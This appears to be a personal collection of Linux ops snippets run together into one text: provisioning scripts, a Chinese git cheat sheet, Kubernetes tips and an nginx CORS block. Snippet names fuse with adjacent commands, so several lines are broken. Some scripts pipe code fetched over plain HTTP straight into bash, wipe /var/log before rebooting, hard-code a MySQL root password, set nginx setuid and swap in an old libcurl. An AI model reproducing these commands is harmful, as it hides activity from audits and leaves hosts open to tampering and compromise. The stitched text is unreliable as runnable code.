mysql <<- EOF
set password for root@localhost=password('io');
create database wordpress;
EOF
systemctl restart mariadb
systemctl restart php-fpm
systemctl enable mariadb
systemctl enable php-fpm
fi
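# Debian family: install PHP 7.x with FPM and MySQL, create the wordpress
# database and drop in the downloaded PHP-FPM pool and rc.local files.
if [ "$OS" = "Debian" ]; then
  apt-get -y update
  apt-get -y install vim wget bzip2 unzip rsync
  apt-get -y remove apache2
  # The patterns are quoted so the shell cannot expand them against files in
  # the current directory; apt-get receives them unchanged.
  apt-get -y install 'php7.[0-9]'
  apt-get -y install 'php7.[0-9]-mysql' 'php7.[0-9]-fpm'
  apt-get -y install 'php7.[0-9]-gd' 'php7.[0-9]-mbstring' 'php7.[0-9]-xmlrpc'
  # --allow-unauthenticated was dropped: it tells apt to install packages
  # whose signatures cannot be verified, which removes the protection against
  # a tampered mirror.
  apt-get -y install mysql-server
  # NOTE(review): the root password 'io' is hard-coded and passed on the
  # command line, where `ps` shows it; use a generated secret instead.
  mysql -pio <<- EOF
create database wordpress;
EOF
  # One download per www.conf that exists. The backtick form broke when find
  # returned no path or more than one.
  find /etc/php/ -name www.conf -exec wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/Debian-php.conf -O {} \;
  wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress-rc.local.conf -O /etc/rc.local
  chmod 755 /etc/rc.local
  systemctl restart mysql
  /etc/init.d/php*-fpm restart
fi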
[ -d /opt/sys ]||mkdir -p /opt/sys
[ -d /var/log/php-fpm ]||mkdir -p /var/log/php-fpm
[ -d /var/log/mariadb ]||mkdir -p /var/log/mariadb
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/openresty-$OS.tgz -O -|tar xzf - -C /opt
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress-nginx.conf -O /opt/openresty/nginx/conf/nginx.conf
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress.tgz -O -|tar xzf - -C /opt
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress-start.sh -O /opt/sys/wordpress-start.sh
chown -R nobody.nobody /opt/openresty
chown -R nobody.nobody /opt/wordpress
chown root.nobody /opt/openresty/nginx/sbin/nginx
chmod +xs /opt/openresty/nginx/sbin/nginx
chmod 700 /opt/sys/wordpress-start.sh
pgrep nginx||/opt/openresty/nginx/sbin/nginxbase cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
yum -y install epel-release
yum -y install bash-completion
yum -y install gcc gcc-c++ make readline-devel pcre-devel openssl-devel perl bzip2-devel clang
yum -q -y install vim wget curl zip bzip2 unzip rsync psmisc net-tools bind-utils telnet openssh-clients pcre openssl
fi
if [ "$OS" = "Debian" ];then
apt-get -y update
apt-get -y install libreadline-dev libpcre3-dev libssl-dev cmake perl libncurses5-dev build-essential clang
apt-get -q -y install vim wget curl zip bzip2 unzip rsync psmisc net-tools dnsutils telnet
fiinfluxdb echo doing...
curl -s xabc.io/b|bash
curl -s xabc.io/e|bash
curl -s xabc.io/v|bash
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
INFLUXDB_VER=1.7.8
if [ "$OS" = "RedHat" ]
then
yum -y install yum-utils
yum -y localinstall https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/influxdb-${INFLUXDB_VER}.x86_64.rpm
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/file/influxdb.repo -O /etc/yum.repos.d/influxdb.repo
fi
if [ "$OS" = "Debian" ]
then
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/influxdb_${INFLUXDB_VER}_amd64.deb
dpkg -i influxdb_${INFLUXDB_VER}_amd64.deb
rm -f influxdb_${INFLUXDB_VER}_amd64.deb
fiinit yum update -y
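#######################################
# Download a remote script completely, then run it with bash. With
# `curl | bash` a dropped connection runs a truncated script and an HTTP
# error page is fed to the shell; -f makes curl fail on HTTP errors.
# Arguments: $1 - URL of the script
# NOTE(review): these URLs have no scheme, so they are fetched over plain
# HTTP and run as the invoking user with no integrity check; serve them over
# HTTPS and verify a pinned checksum before executing.
#######################################
run_remote() {
  local url=$1 script
  script=$(mktemp) || return
  curl -fsS "$url" -o "$script" && bash "$script"
  rm -f -- "$script"
}

run_remote xabc.io/a
run_remote xabc.io/k
# NOTE(review): this wipes every existing log on the host just before the
# reboot, including whatever the two scripts above wrote, so the provisioning
# run cannot be audited afterwards. Ship or archive the logs first if they are
# needed.
rm -rf /var/log;mkdir -p /var/log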
rebootg salt \* saltutil.sync_grainsistio echo doing...
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/istio/istio.tgz -O -|tar xzf - -C /opt
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/istio/xabc-istio.sh -O /etc/profile.d/xabc-istio.sh
echo /opt/istiodep curl https://raw.githubusercontent.com/golang/dep/master/install.sh|bashgo wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/go.tgz -O -|tar xzf - -C /usr/local
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/xabc-go.sh -O /etc/profile.d/xabc-go.shto tail -f access.log|awk '$2 > 2 {print $0}'y ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|grep -E '^10\.|^172\.1[6-9]\.|^172\.2[0-9]\.|^172\.3[0-1]\.|^192\.168\.'|head -1h cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
# CPU: number of lines in /proc/cpuinfo that contain "processor".
# MEM: the total from the "Mem" line of `free`, with 1048576 added and then
# divided by 1048576 and truncated (presumably KiB to whole GiB; confirm the
# unit `free` prints on the target hosts).
CPU=$(grep "processor" /proc/cpuinfo | wc -l)
MEM=$(free | awk '/Mem/ {print int(($2+1048576)/1048576)}')
echo "$OS $CPU $MEM"busybox [ -d /usr/local/bin ]||mkdir -p /usr/local/bin
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/busybox -O /usr/local/bin/busybox
chmod +x /usr/local/bin/busyboxpycurl mkdir -p /tmp/build&&cd /tmp/build
# Build curl 7.43.0 from a downloaded tarball and install it under /usr/local.
# NOTE(review): the tarball is unpacked and built without a checksum or
# signature check.
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/curl-7.43.0.tar.gz -O -|tar xzf -
cd curl-7.43.0
./configure
make && make install
# Move the distro's libcurl.so.4* out of /usr/lib64 and point the system
# library names at the freshly built /usr/local copy.
# NOTE(review): after this, every program linked against the system libcurl
# loads the pinned 7.43.0 build (a 2015 release), and distro security updates
# for libcurl no longer take effect. Prefer building pycurl against the
# distro's libcurl development package.
mv /usr/lib64/libcurl.so.4* /tmp/
ln -sf /usr/local/lib/libcurl.so.4.3.0 /usr/lib64/libcurl.so.4.3.0
ln -sf /usr/local/lib/libcurl.so.4.3.0 /usr/lib64/libcurl.so.4
pip3 install pycurlq echo doing...
find / -empty -mtime +7 ! -path "/proc/*" -a ! -path "/sys/*" -a ! -path "/etc/*" ! -path "/boot/*" -type f -a -name "*.log" -delete
for i in $(find `du -s /* --exclude={proc,etc,sys,boot,run,mnt}|sort -nr|head -7|awk '{print $2}'|tr '\n' ' '` -type f -a -name "*.log" ! -name ".xabc.log" ! -name ".usercmd.log" ! -name "usercmd.log" ! -name ".sys.log" -o -name "catalina.out");do echo $i;> $i;donepandas import pandas as pd
pd.set_option('display.max_rows', 10000) #最大行数
pd.set_option('display.max_columns', 1000) #最大列数
pd.set_option('display.width', 10000) #页面宽度call pip3 install aliyun-python-sdk-core
pip3 install aliyun-python-sdk-dyvmsapi
tcp netstat -n|awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'sh cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ]
then yum -q -y install vim bash-completion
fi
if [ "$OS" = "Debian" ]
then apt-get -q -y install vim bash-completion
fi
curl -sLo /etc/profile.d/xabc_bash.sh https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/xabc_bash.sh
git git clone https://gitlab.glority.cn/operation/matrix-build.git ./build (clone 到指定目录)
整理的常用 Git 命令清单。几个专用名词的译名如下。
Workspace:工作区
Index / Stage:暂存区
Repository:仓库区(或本地仓库)
Remote:远程仓库
当你修复完线上问题,切回 feature 分支,想恢复代码也只需要:git stash apply
相关命令# 保存当前未commit的代码
git stash
# 保存当前未commit的代码并添加备注
git stash save "备注的内容"
# 列出stash的所有记录
git stash list
# 删除stash的所有记录
git stash clear
# 应用最近一次的stash
git stash apply
# 应用最近一次的stash,随后删除该记录
git stash pop
# 删除最近的一次stash
git stash drop
一、新建代码库
在当前目录新建一个Git代码库 $ git init
新建一个目录,将其初始化为Git代码库 $ git init [project-name]
下载一个项目和它的整个代码历史 $ git clone [url]
二、配置
Git的设置文件为.gitconfig,它可以在用户主目录下(全局配置),也可以在项目目录下(项目配置)。
#显示当前的Git配置 $ git config --list
#编辑Git配置文件 $ git config -e [--global]
#设置提交代码时的用户信息 $ git config [--global] user.name "[name]"
$ git config [--global] user.email "[email address]"
三、增加/删除文件
#添加指定文件到暂存区 $ git add [file1] [file2] …
#添加指定目录到暂存区,包括子目录 $ git add [dir]
#添加当前目录的所有文件到暂存区 $ git add .
#添加每个变化前,都会要求确认 # 对于同一个文件的多处变化,可以实现分次提交 $ git add -p
#删除工作区文件,并且将这次删除放入暂存区 $ git rm [file1] [file2] …
#停止追踪指定文件,但该文件会保留在工作区 $ git rm --cached [file]
#改名文件,并且将这个改名放入暂存区 $ git mv [file-original] [file-renamed]
四、代码提交
#提交暂存区到仓库区 $ git commit -m [message]
#提交暂存区的指定文件到仓库区 $ git commit [file1] [file2] … -m [message]
#提交工作区自上次commit之后的变化,直接到仓库区 $ git commit -a
#提交时显示所有diff信息 $ git commit -v
#使用一次新的commit,替代上一次提交 # 如果代码没有任何新变化,则用来改写上一次commit的提交信息 $ git commit --amend -m [message]
#重做上一次commit,并包括指定文件的新变化 $ git commit --amend [file1] [file2] …
五、分支
#列出所有本地分支 $ git branch
#列出所有远程分支 $ git branch -r
#列出所有本地分支和远程分支 $ git branch -a
#新建一个分支,但依然停留在当前分支 $ git branch [branch-name]
#新建一个分支,并切换到该分支 $ git checkout -b [branch]
#新建一个分支,指向指定commit $ git branch [branch] [commit]
#新建一个分支,与指定的远程分支建立追踪关系 $ git branch --track [branch] [remote-branch]
#切换到指定分支,并更新工作区 $ git checkout [branch-name]
#切换到上一个分支 $ git checkout -
#建立追踪关系,在现有分支与指定的远程分支之间 $ git branch --set-upstream [branch] [remote-branch]
#合并指定分支到当前分支 $ git merge [branch]
#选择一个commit,合并进当前分支 $ git cherry-pick [commit]
#删除分支 $ git branch -d [branch-name]
#删除远程分支 $ git push origin --delete [branch-name]
$ git branch -dr [remote/branch]
六、标签
#列出所有tag $ git tag
#新建一个tag在当前commit $ git tag [tag]
#新建一个tag在指定commit $ git tag [tag] [commit]
#删除本地tag $ git tag -d [tag]
#删除远程tag $ git push origin :refs/tags/[tagName]
#查看tag信息 $ git show [tag]
#提交指定tag $ git push [remote] [tag]
#提交所有tag $ git push [remote] --tags
#新建一个分支,指向某个tag $ git checkout -b [branch] [tag]
git tag -a 2020-07-08 -m '2020-07-08'
git push 2020-07-08
七、查看信息
#显示有变更的文件 $ git status
#显示当前分支的版本历史 $ git log
#显示commit历史,以及每次commit发生变更的文件 $ git log --stat
#搜索提交历史,根据关键词 $ git log -S [keyword]
#显示某个commit之后的所有变动,每个commit占据一行 $ git log [tag] HEAD --pretty=format:%s
#显示某个commit之后的所有变动,其"提交说明"必须符合搜索条件 $ git log [tag] HEAD --grep feature
#显示某个文件的版本历史,包括文件改名 $ git log --follow [file]
$ git whatchanged [file]
#显示指定文件相关的每一次diff $ git log -p [file]
#显示过去5次提交 $ git log -5 --pretty --oneline
#显示所有提交过的用户,按提交次数排序 $ git shortlog -sn
#显示指定文件是什么人在什么时间修改过 $ git blame [file]
#显示暂存区和工作区的差异 $ git diff
#显示暂存区和上一个commit的差异 $ git diff --cached [file]
#显示工作区与当前分支最新commit之间的差异 $ git diff HEAD
#显示两次提交之间的差异 $ git diff [first-branch]...[second-branch]
#显示今天你写了多少行代码 $ git diff --shortstat "@{0 day ago}"
#显示某次提交的元数据和内容变化 $ git show [commit]
#显示某次提交发生变化的文件 $ git show --name-only [commit]
#显示某次提交时,某个文件的内容 $ git show [commit]:[filename]
#显示当前分支的最近几次提交 $ git reflog
八、远程同步
#下载远程仓库的所有变动 $ git fetch [remote]
#显示所有远程仓库 $ git remote -v
#显示某个远程仓库的信息 $ git remote show [remote]
#增加一个新的远程仓库,并命名 $ git remote add [shortname] [url]
#取回远程仓库的变化,并与本地分支合并 $ git pull [remote] [branch]
#上传本地指定分支到远程仓库 $ git push [remote] [branch]
#强行推送当前分支到远程仓库,即使有冲突 $ git push [remote] --force
#推送所有分支到远程仓库 $ git push [remote] --all
九、撤销
#恢复暂存区的指定文件到工作区 $ git checkout [file]
#恢复某个commit的指定文件到暂存区和工作区 $ git checkout [commit] [file]
#恢复暂存区的所有文件到工作区 $ git checkout .
#重置暂存区的指定文件,与上一次commit保持一致,但工作区不变 $ git reset [file]
#重置暂存区与工作区,与上一次commit保持一致 $ git reset --hard
#重置当前分支的指针为指定commit,同时重置暂存区,但工作区不变 $ git reset [commit]
#重置当前分支的HEAD为指定commit,同时重置暂存区和工作区,与指定commit一致 $ git reset --hard [commit]
#重置当前HEAD为指定commit,但保持暂存区和工作区不变 $ git reset --keep [commit]
#新建一个commit,用来撤销指定commit # 后者的所有变化都将被前者抵消,并且应用到当前分支 $ git revert [commit]
#暂时将未提交的变化移除,稍后再移入 $ git stash
$ git stash pop
十、其他
#查看远程分支和本地分支的对应关系 $git remote show origin
#从本地删除远程已经删除的分支的tracking(在issue被merge之后,远程分支会被删除,那么相应的本地tracking我们也可以删除掉) $git remote prune origin
#从本地删除远程已经删除的分支(merge后可以执行此操作保持工作区的清洁) $git fetch -p && for branch in `git branch -vv | grep ': gone]' | awk '{print $1}'`; do git branch -D $branch; done
#生成一个可供发布的压缩包 $ git archive
b cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ]
then yum -y install vim wget bzip2 unzip rsync psmisc net-tools bind-utils telnet bash-completion
fi
if [ "$OS" = "Debian" ]
then apt-get -y install vim wget bzip2 unzip rsync psmisc net-tools dnsutils telnet
fialiyunexporter pip3 install aliyun-exporter
pip3 uninstall werkzeug
pip3 install PyYAML -U
pip3 install werkzeug==0.16.1tools cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ]
then yum -y install vim wget bzip2 unzip rsync bash-completion git tmux inotify-tools axel jq
fi
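# Debian family: install the common tool set. The subcommand was misspelled
# "insall", so apt-get rejected it and nothing was installed.
if [ "$OS" = "Debian" ]; then
  apt-get -y install vim wget bzip2 unzip rsync git tmux inotify-tools luajit jq
fi

# upx
# -f makes curl fail on an HTTP error instead of saving the error page as the
# binary.
# NOTE(review): an executable is placed on root's PATH from object storage
# with no checksum check; pin and verify a SHA-256 before the chmod +x.
curl -f https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/upx -o /usr/local/bin/upx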
chmod +x /usr/local/bin/upxuninstall cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ]
then yum -y erase
fi
if [ "$OS" = "Debian" ]
then echo hello
fikubectl # kubectl edit deployment filelist -n htdz 查看deployment 中 filelist 的模版
#curl -LO https://dl.k8s.io/release/v1.21.0/bin/linux/amd64/kubectl
#curl -LO https://storage.googleapis.com/kubernetes-release/release/`curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt`/bin/linux/amd64/kubectl
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/k8s/kubectl -O /usr/local/bin/kubectl
chmod +x /usr/local/bin/kubectlki curl -sLo /usr/local/bin/ki https://r2.xabc.io/ki.py
curl -sLo /etc/profile.d/zki.sh https://r2.xabc.io/zki.sh
chmod 755 /usr/local/bin/ki
printf "\033[1;32m%s\033[0m\n" "退出终端重新登录,输入指令 # ki 试试看"kompose wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/k8s/kompose -O /usr/local/bin/kompose
chmod +x /usr/local/bin/komposev wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/vim.tgz -O -|tar xzf - -C ~tf wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/terraform/terraform -O /usr/local/bin/terraform
chmod +x /usr/local/bin/terraform
/usr/local/bin/terraform -install-autocompletet ip addr | awk '/inet / {sub(/\/.*/, "", $2); print $2}'|grep -E '^10\.|^172\.1[6-9]\.|^172\.2[0-9]\.|^172\.3[0-1]\.|^192\.168\.'|head -1n hostnamectl --static set-hostnamek8stips
1.当将线上kubernetes宿主机的ARP参数都改大后,再也没有出现过此类问题了。
sysctl -w net.ipv4.neigh.default.gc_thresh3=32768
sysctl -w net.ipv4.neigh.default.gc_thresh2=16384
sysctl -w net.ipv4.neigh.default.gc_thresh1=8192
2.K8S故障排查指南- but volume paths are still present on disk
1.上面错误信息可以通过 journalctl -u kubelet -f 或者 tail -f /var/log/messages 命令查看到。
2. # 查看 etc-hosts 文件中 pod name 名称
$ cat /var/lib/kubelet/pods/9e6d9bdd-1554-45e6-8831-53e83f8ea263/etc-hosts
# 删除 9e6d9bdd-1554-45e6-8831-53e83f8ea263 目录
$ cd /var/lib/kubelet/pods/
$ rm -rf 9e6d9bdd-1554-45e6-8831-53e83f8ea263
3. 现在再通过 journalctl -u kubelet -f 命令查看 kubelet 日志,就没有 Orphaned pod found - but volume paths are still present on disk 的报错了。
3.走flannel的vxlan网络,vxlan需要放开udp/8472
4. 下面配置意味着单个负载会调度到一个剩余CPU request大于0.1核,剩余request内存大于200MB的节点,并且负载运行时的CPU使用率不能高于0.4核(超过将被限流),内存使用不多于300MB(超过将被OOM Kill并重启)
resources:
requests:
memory: 200Mi
cpu: "0.1"
limits:
memory: 300Mi
cpu: "0.4"
5. 使用 kubectl 来创建 TLS Secret 时,你可以像下面的例子一样使用 tls 子命令:
kubectl create secret tls my-tls-secret --cert=path/to/cert/file --key=path/to/key/file
# 镜像字体 fonts-dejavu
# /etc/sysctl.d/k8s.conf ( 确保 pod 之间 IP 互通)
net.bridge.bridge-nf-call-ip6tables = 1
net.ipv4.ip_forward = 1
net.bridge.bridge-nf-call-iptables = 1
6. kubectl get pod --field-selector=status.phase==Running
7. immutable: true ( 不可更改的 secret / configmap )
8. 访问某pod的某个容器: kubectl --namespace=default exec -it user-deployment-54469dd57-vg87g --container user -- sh
# kubectl scale deploy -n <namespace> --replicas=1 --all 可以用 scale 指令修改指定命名空间下所有 deploy 的副本数量。
#设置k8s预留资源保护
#/etc/systemd/system/kubelet.service.d/10-kubeadm.conf
#Environment="KUBELET_CUSTOMIZED_ARGS1=--eviction-hard=imagefs.available<15%,memory.available<2Gi,nodefs.available<10%,nodefs.inodesFree<5% --system-reserved=memory=1Gi --kube-reserved=memory=400Mi --kube-reserved=pid=1000 --system-reserved=pid=1000"
# systemctl daemon-reload;systemctl restart kubelet (重启kubelet 生效)
#ingress配置增加注解(annotations):nginx.ingress.kubernetes.io/ssl-redirect: 'true' 就可以实现http强制跳转至https
#deployment
imagePullPolicy: IfNotPresent
1.简述Kubernetes中Pod可能位于的状态?
Pending:API Server已经创建该Pod,且Pod内还有一个或多个容器的镜像没有创建,包括正在下载镜像的过程。
Running:Pod内所有容器均已创建,且至少有一个容器处于运行状态、正在启动状态或正在重启状态。
Succeeded:Pod内所有容器均成功执行退出,且不会重启。
Failed:Pod内所有容器均已退出,但至少有一个容器退出为失败状态。
Unknown:由于某种原因无法获取该Pod状态,可能由于网络通信不畅导致。
apt update && apt install telnet net-tools curl vim -y
2.alpine 镜像调试
apk add --no-cache busybox-extrasu ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|awk '/^10\.|^172\.|^192\./'|head -1sk echo $(cat ./config | base64) |tr -d " "|openssl aes-256-cbc -salt -pbkdf2 -k $SALT > secret_kubeconfigip IP=${SSH_CONNECTION% *};IP=${IP##* };[ -n "$IP" ]||IP=$(ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|awk '/^10\.|^172\.|^192\.|^100\./'|head -1);echo $IPshell #${#string} $string的长度
#${string:position} 在$string中, 从位置$position开始提取子串
#${string:position:length} 在$string中, 从位置$position开始提取长度为$length的子串
#${string#substring} 从变量$string的开头, 删除最短匹配$substring的子串
#${string##substring} 从变量$string的开头, 删除最长匹配$substring的子串
#${string%substring} 从变量$string的结尾, 删除最短匹配$substring的子串
#${string%%substring} 从变量$string的结尾, 删除最长匹配$substring的子串
#${string/substring/replacement} 使用$replacement, 来代替第一个匹配的$substring
#${string//substring/replacement} 使用$replacement, 代替所有匹配的$substring
#${string/#substring/replacement} 如果$string的前缀匹配$substring, 那么就用$replacement来代替匹配到的$substring
#${string/%substring/replacement} 如果$string的后缀匹配$substring, 那么就用$replacement来代替匹配到的$substring
#大小写转换
$ test="abcDEF"
# 把变量中的第一个字符换成大写
$ echo ${test^}
AbcDEF
# 把变量中的所有小写字母,全部替换为大写
$ echo ${test^^}
ABCDEF
# 把变量中的第一个字符换成小写
$ echo ${test,}
abcDEF
# 把变量中的所有大写字母,全部替换为小写
$ echo ${test,,}
abcdef
${VALUE:-WORD}:当变量未定义或者值为空时,返回值为WORD的内容,否则返回变量的值。
${VALUE:=WORD}:当变量未定义或者值为空时,返回WORD的值的同时并将WORD赋值给VALUE,否则返回变量的值。
${VALUE:+WORD}:当变量已赋值时,其值才用WORD替换,否则不进行任何替换。
${VALUE:?MESSAGE}:当变量已赋值时,正常替换。否则将消息MESSAGE送到标准错误输出(若此替换出现在SHELL程序中,那么该程序将终止运行)。
补充:WORD可以为一个字符串,也可以为一个变量。当为变量时,需要用“$”引用该变量。
颜色指令
0 : Reset Color Attributes
1 : 加粗
2 : 去粗
4 : 下划线
5 : 闪烁
7 : 反色
21/22 : 加粗 正常
24 : 去掉下划线
25 : 停止闪烁
27 : 反色
30 : 前景,黑色
31 : 前景,红色
32 : 前景,绿色
33 : 前景,黄色
34 : 前景,蓝色
35 : 前景,紫色
36 : 前景,青色
37 : 前景,白色
40 : 背景,黑色
41 : 背景,红色
42 : 背景,绿色
43 : 背景,黄色
44 : 背景,蓝色
45 : 背景,紫色
46 : 背景,青色
47 : 背景,白色
其它转义字符命令
清除屏幕 : \033c
设定水平光标位置 : \033[XG
X为水平光标位置。
设定垂直光标位置 : \033[Yd
Y为垂直光标位置。
\033[0K : 删除从光标到该行结尾
\033[1K : 删除从该行开始到光标处
\033[2K : 删除整行
\033[0J : 删除光标到萤幕结尾
\033[1J : 删除从萤幕开始到光标处
\033[2J : 删除整个屏幕r echo doing...
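# Run the helper snippets b, e and v, then install the prebuilt Redis bundle into /opt/redis.
# NOTE(review): no scheme is given, so curl fetches these over plain http and bash
# executes whatever comes back. Prefer an https URL with -f, saved to a file and
# compared with a pinned digest before it is run.
curl -s xabc.io/b|bash
curl -s xabc.io/e|bash
curl -s xabc.io/v|bash
# Distro detection: OS is only assigned when a pattern matches, and the second
# test overrides the first when both match.
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
# Unpack into a private mktemp directory rather than the predictable, shared
# /tmp/redis, so no other local user can pre-create or alter the staged files.
stage_dir=$(mktemp -d) || exit 1
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/src/redis.tgz -O -|tar xzf - -C "$stage_dir"
mv "$stage_dir/redis/files/redis-$OS" /opt/redis
rm -rf -- "$stage_dir"
mkdir -p /opt/redis/conf
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/redis.conf -O /opt/redis/conf/redis.conf
# Owner-execute only on the Redis binaries.
chmod 100 /opt/redis/bin/*
# NOTE(review): the downloaded redis.conf is not shown here; confirm it sets bind and
# requirepass (or ACLs) before the port is reachable from other hosts.
pgrep redis||/opt/redis/bin/redis-server /opt/redis/conf/redis.conf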
ps aux|grep redistips # 编译 openresty
# wget -t 3 https://openresty.org/download/openresty-1.21.4.3.tar.gz -O -|tar xzf -
# wget -t 3 https://zlib.net/current/zlib.tar.gz -O -|tar xzf -
# yum -y install gcc gcc-c++ make readline-devel pcre-devel openssl-devel perl bzip2-devel clang zlib-devel
#./configure --prefix=/home/ywgx/0/openresty --with-pcre-jit --with-stream --with-stream_ssl_preread_module --with-stream_ssl_module --with-http_v2_module --with-http_iconv_module --without-http_limit_req_module --without-http_limit_conn_module --without-http_split_clients_module --without-poll_module --without-select_module --without-http_fastcgi_module --without-http_uwsgi_module --without-http_scgi_module --without-http_memcached_module --without-http_ssi_module --without-http_geo_module --without-http_empty_gif_module --without-http_browser_module --without-http_upstream_ip_hash_module --without-http_upstream_least_conn_module --without-http_upstream_zone_module --with-zlib=../zlib
# nginx CORS configuration
# NOTE(review): '*' lets every origin read these responses. For an API that accepts the
# Authorization header, answer only origins from an allowlist and add 'Vary: Origin'.
add_header 'Access-Control-Allow-Origin' '*' always;
add_header 'Access-Control-Allow-Headers' 'Authorization,Accept,Origin,Keep-Alive,User-Agent,Content-Type' always;
add_header 'Access-Control-Allow-Methods' 'GET,POST,OPTIONS,PUT,DELETE' always;
add_header 'Access-Control-Expose-Headers' 'X-Jump,X-Session-Valid' always;
# Preflight handling. add_header is inherited from the outer level only when the current
# level defines none, which is why the four headers are repeated inside the if block.
if ($request_method = 'OPTIONS') {
add_header 'Access-Control-Allow-Origin' '*' always;
add_header 'Access-Control-Allow-Headers' 'Authorization,Accept,Origin,Keep-Alive,User-Agent,Content-Type' always;
add_header 'Access-Control-Allow-Methods' 'GET,POST,OPTIONS,PUT,DELETE' always;
add_header 'Access-Control-Expose-Headers' 'X-Jump,X-Session-Valid' always;
# 1728000 s = 20 days of preflight caching; browsers apply their own, lower cap.
add_header 'Access-Control-Max-Age' 1728000;
return 204;
}
#查询命令安装包 yum provides envsubst 或者 yum whatprovides envsubst
#标准输出 /dev/stdout
#标准输入 /dev/stdin
#标准错误输出 /dev/stderr
#nfs 依赖 yum -y install nfs-utils
#sftp 可以 ftp 不行的问题,查看 getsebool allow_ftpd_full_access 如果是 off ,可以打开 setsebool allow_ftpd_full_access
#pip3 install -U pip setuptools
#pip3 download -d packages/ -r requirements.txt 把依赖包都下到packages文件夹里
#pip3 install --no-index --find-links=packages/ -r requirements.txt 离线安装
#pip3 freeze > requirements.txt
# problem making ssl connection
先把 /etc/yum.repos.d/rdo-release.repo 里的 enabled 改为 0(禁用该源),
再执行 yum install ca-certificates
# RPM 数据库问题 'yum check' 解决方法
package-cleanup --cleandupes
# module_name = shell 将默认的模块改为shell,command模块功能太弱
ansible AppGroup -m shell -a 'w'
#查看域名 dns
dig baidu.com +nssearch
#显示连接用户信息
ss -tapo dport = :3306
#可以使用以下命令查使用内存最多的10个进程
ps -aux | sort -k4nr | head -n 10
#可以使用以下命令查使用CPU最多的10个进程
ps -aux | sort -k3nr | head -n 10
# 物理内存大小 = 物理已使用的内存 + 物理没使用的内存
total = used + free
# 可用内存大小 = 物理没使用的内存 + 缓冲 + 缓存
available = free + buffers + cached
# 内存使用率 = (物理内存大小 - 可用内存大小) / 物理内存大小 * 100
percent = (total - available) / total * 100
/etc 系统文件属性恢复
#restorecon -Rv /etc
PATH=$PATH:$HOME/.local/bin:$HOME/bin
查看某进程的文件打开数
cat /proc//limits
ls -lh /proc//fd
ls -lh /proc//fd|wc -l
import salt.client
local = salt.client.LocalClient()
print(help(local.cmd))
find . -type f | parallel -j+0 grep -i foobar 并发的grep
systemctl list-unit-files --type=service|grep enabled
ulimit -n # 查看当前用户可用最大句柄
sysctl -a | grep fs.file-max # 查看内核级的文件句柄最大限制值
cat /proc/sys/fs/file-nr # 查看当前已用的文件句柄数量 和 内核级的文件句柄限制的最大值
乱码转换
:set fileencoding=UTF-8
:x!
TAB替换为空格:
:se ts=4
:se et
:%retab!
空格替换为TAB:
:se ts=4
:se noet
:%retab!
curl 2 python: https://curl.trillworks.com
au BufNewFile,BufRead *.py se ts=4 sts=4 sw=4 et
k8s
minikube start --driver=hyperv --memory=4096m --image-repository=registry.cn-hangzhou.aliyuncs.com/google_containers
